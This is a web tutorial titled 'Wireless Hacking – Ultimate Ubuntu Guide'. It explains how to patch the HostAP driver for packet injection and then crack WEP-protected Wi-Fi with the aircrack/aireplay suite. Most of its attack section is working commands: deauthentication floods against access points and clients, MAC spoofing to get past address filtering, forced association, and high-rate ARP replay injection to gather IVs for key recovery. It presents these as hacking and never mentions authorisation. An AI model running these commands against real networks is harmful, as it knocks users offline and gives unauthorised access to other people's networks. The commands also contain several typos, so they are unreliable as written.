RSS Feed twitter airdump.cz Follow RemoteSec on the Facebook
Remote Security Random Tips
News & Ads

Wireless Hacking – Ultimate Ubuntu Guide

ubuntu wifi hacking Operating system in the tutorial: Ubuntu 6.06 LTS Dapper Drake (works also with Ubuntu 6.10, 7.04, 7.10, 8.04, 9.04, 10.04 – see link for patching hostap in newer Ubuntu distro), Hardware you meet in the tutorial: WiFi adapters Z-Com XI-626 (Prism 2.5), CM9 (Atheros), Application: Aircrack Pack, Kismet, tcpdump, Driver: HostAP + packet injection patch tutorial. Question and discussion is moved to the other things in the Forum Ubuntu Security thread.

Lead-up

Ubuntu repositories contains everithing needed including hostap source but we use the last version of hostap 0.4.9 and 0.4.7 packet injection patch.

Ubuntu installed from DVD uses kernel by proccesor type (in case AMD it uses kernerl k7, in Intel case it uses kernel i386).

Packet injection patch doesn’t work under k7 kernel! correctly or at all.

So we need to install kernel headers and i386 kernel image and boot it up.

Z-com XI-626 adapter (generali in linux) runs under Orinoco module. Modrpobe how to..

Get out that module like root do it:

modprobe -r orinoco_pci
modprobe hostap_pci

Add line

blacklist orinoco_pci into /etc/modprobe.d/blacklist

Driver

After reboot download the driver and use the patch.

wget http://hostap.epitest.fi/releases/hostap-driver-0.4.9.tar.gz
tar -xvzf hostap-driver-0.4.9.tar.gz
cd hostap-driver-0.4.9
wget http://patches.aircrack-ng.org/hostap-driver-0.4.7.patch
patch -Np1 -i hostap-driver-0.4.7.patch

Next ..in the path /home/user/hostap-driver-0.4.9/driver/modules/ search for files:

hostap.c
hostap_cs.c
hostap_plx.c
hostap_pci.c

In one of each file find these five rows and remove them.

#if
(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,14))
#error
Host AP driver was added into Linux 2.6.14.
#error
The version used in the kernel tree should be used instead of this
#error
external release which is only maintained for old kernel versions.
#endif

Let compilation begins.. run make

After.., don’t use “make install”. First yuo should store original contents then clean up /hostap folder and copy all *.ko files from /hostap-driver-0.4.9/driver/modules/ into /lib/modules/2.6…..-386/kernel/drivers/net/wireless/hostap/

Next .. Find and copy hostap_en.conf from /hostap-driver-0.4.9/driver/etc/ into /etc/pcmcia/

Reboot. After reboot run these commands:

depmod -a
ifconfig wlan0 down
ifconfig wlan0 up

Check with commnad dmesg | grep hostap

linux hacking

Firmware

Z-Com with firmware newer than 1.7.4 is in the system registred as ethX. This version of firmware is recommended. Otherwise try to flash you adapter. Check your version of firmware with

hostap_diag -p wlan0

‘ll see something like that: Host AP driver diagnostics information for ‘wlan0’

NICID:
id=0x8013 v1.0.0 (PRISM II (2.5) Mini-PCI (SST parallel flash)
PRIID:
id=0x0015 v1.1.1
STAID:
id=0x001f v1.7.4 (station firmware)

Channel no. 14

To get running 14. channel on Z-Com adapter we need edit PDA (Production Data Area). Don’t change localization. Just change

1fff to 3fff on line 0x0104.

Testing functionality

Packet injection is nothing more than time reduction. Cracking of WEP is possible without packet injection but it can take tens of hours or few days. Aircrack pack contains these parts: aircrack, airodump, airmon, aireplay, airdecap

Aircrack-ng pack contains these parts: aircrack-ng, airodump-ng, airmon-ng, aireplay-ng, packetforge-ng, airtun-ng, airserv-ng. We uses packet injection in Aireplay. Before we start to laborate we should check if packet injection works.

Option 1: Switch adapter to monitor mode. Command iwconfig contains wireless tools, airmon pack aircrack.

iwconfig wlan0 mode monitor or airmon start wlan0 for aircrack-ng command airmon-ng start wlan0

Now run Ethereal or Wireshark with realtime traffic showing on wlan0 adapter. For showing only deauth packets use filter

wlan.fc.type_subtype 12

In next step run in shell command

aireplay -0 5 -a 01:02:03:04:05:06 wlan0

(command for newer version aircrack-ng is aireplay-ng -0 5 -a 01:02:03:04:05:06 wlan0

In Ethereal window you see five deauth packets with MAC address 01:02:03:04:05:06

Option II -> Test with AP with hidden ESSID. When client deauth doesn’t work on encrypted network even if you know its MAC you have bad luck.

Monitor mode, detection

About WEP (Wired Equivalent Privacy) weaknesses was written hundreds pages of text and new theories like Chopchop are comming out. So if you want to know more about it go and search.

Switch adapter to monitor mode

airmon start wlan0

(command for aircrack-ng airmon-ng start wlan0 )

airmon-ng ubuntu

Run Airdodump that until stopped (ctr+c) scans available networks. “3”
is number of channel. “out” is log file. “1” after the number channel means that only WEP packets will be logged. (Name of the log file and channel number is optional)

airodump wlan0 out 3 1

command for aircrack-ng is airodump-ng –ivs -w out –ch 3 wlan0

for Aircrack-ng with particular MAC in case that quantum of APs are around..

airodump-ng –bssid 00:60:Bx:xx:xx:xx –ivs -w out –ch 3 wlan0

aireplay-ng association

Aircrack comment: Without ininitation of file format “1” (means “ivs”) is possible to store into pcap. First we notice is strength of signal. Too big or small distance is problem. In first case (saturation) there is no must to have the signal even if you have AP next on your desk. Viewed PWR are authentic. Value lower than 163 means no-hope.

Optimal PWR value is between 167 and 195. Locating the best direction by the move of the antenna and watching PWR coast minimum of time. Finding out the polarization is metter of rotating antenna 90°. To gain transfer use power regulation (standard on Z-Com is 198):

iwpriv wlan0 writemif 62 130

This leads to less packet loss:

wconfig wlan0 rate 1M

Sensitivity control:

iwconfig wlan0 sens 3 [1, 2, 3]

Deauth, Packet injection, Hidden essid

Detected AP have a good singnal with connected clients and doesn’t provide ESSID.

airodump-ng

Use Aireplay -0. Number 5 means count of deauth packets that we send, “-0” is the first of five mods in Aireplay.

Deauth to broadcast

aireplay -0 5 -a 00:60:BX:xx:xx:xx wlan0

Deauth client with MAC.

aireplay -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

Deauth to broadcast with MAC of source

aireplay -0 5 -a 00:60:BX:xx:xx:xx -h 00:60:BZ:xx:xx:xx wlan0

Deauth to client with MAC of source

aireplay -0 5 -a 00:60:BX:xx:xx:xx -h 00:60:BZ:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

cmd for Aireplay-ng:

aireplay-ng -0 5 -a 00:60:BX:xx:xx:xx -c 00:60:BY:xx:xx:xx wlan0

aireplay-ng deauth

Deauth “disconnect” the client connected to AP and Airodump in the first shell records reconnect of that client containing ESSID. Now we have name of the AP.

hidden essid airodump-ng

PenTest: Association

To begin the communication with AP it is necessary at first to nock on the door :-) that means to associate. In case that on the AP is the MAC restriction set up it is necessary to know at least one valid MAC address. Exactly for this serves the projection of connected clients. When Airodump does not detect any clients it means: bad signal, bad timing :-), ad-hoc network, or it is a data AP. On this data AP nobody usualy connects and it serves only as a data line (used for example by UPC), repeater (bridge)

aireplay -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx wlan0

Aireplay-ng cmd:

aireplay-ng -1 0 -e AP_jmeno -a 00:60:BX:xx:xx:xx -h 00:60:BY:xx:xx:xx ath0

association to access point

In case of a sufficient signal, knowledge of essid [AP name] and allowed (in the case of mac restriction) MAC address the association works on 99%.

ARP, trafic generation

After the association run the packet injection by the Aireplay -3 [ARP-request reply] Replayig multiples the traffic, number of WEP packets, even the number of initializing vectors :-)

aireplay -3 -b apMAC -h 00:60:BX:xx:xx:xx -x 600 wlan0

Aireplay-ng:

aireplay-ng -3 -b apMAC -h 00:60:BX:xx:xx:xx -x 600 wlan0

arp replay aireplay-ng

-x 600 stands for number of packets in a second. Number of ARP request -u stops on number 1024.

In the first panel see the progress.

aireaplay-ng result

The time in which Airodump gathers enough of packets [for 64bit code 80 to 300 000, for128bit coding 300 000 to 1 000 000 packets] depends on the speed of the line – quality of the signal as mentioned above. Duration of packet gathering is 10 minutes to one hour. [+ , -] Ideal is to associate on the same mac address as the client who himself generates traffic [for example downloading on p2p ].

In this case after packet injection start up 300 000 ivs happends in few minutes. Aireplay as well as Airodump and Aircrack can be stoped and restarted without influencing the result.

Second Part of the Wireless Penetration Testing continue at text Korek, Kismet and Gateway

Similar Posts: